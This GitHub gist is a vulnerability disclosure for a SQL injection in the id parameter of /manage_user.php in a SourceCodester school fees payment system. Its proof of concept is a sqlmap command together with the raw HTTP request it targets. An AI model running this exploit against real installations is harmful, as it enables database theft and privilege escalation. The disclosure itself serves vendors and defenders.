Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save topsky979/14187eec46d6bc04772eadae7ac4e930 to your computer and use it in GitHub Desktop.
Save topsky979/14187eec46d6bc04772eadae7ac4e930 to your computer and use it in GitHub Desktop.

[description]

School Fees Payment System was discovered to contain a SQL Injection vulnerability via the URI /manage_user.php.


[Vulnerability Type]

SQL Injection


[Vendor of Product]

https://www.sourcecodester.com/php/14567/school-fees-payment-system-using-phpmysqli-source-code.html


[Affected Product Code Base]

1.0


[Impact Escalation of Privileges]

true


[POC] sqlmap commands:

python sqlmap.py -r C:\Users\Administrator\Desktop\a.txt --batch --banner --flush-session

a.txt

GET /manage_user.php?id=1 HTTP/1.1
Host: localhost
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"
Accept: */*
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/index.php?page=users
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=ku92iqbs3e1fpskj8d0jev1unj
Connection: keep-alive



image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment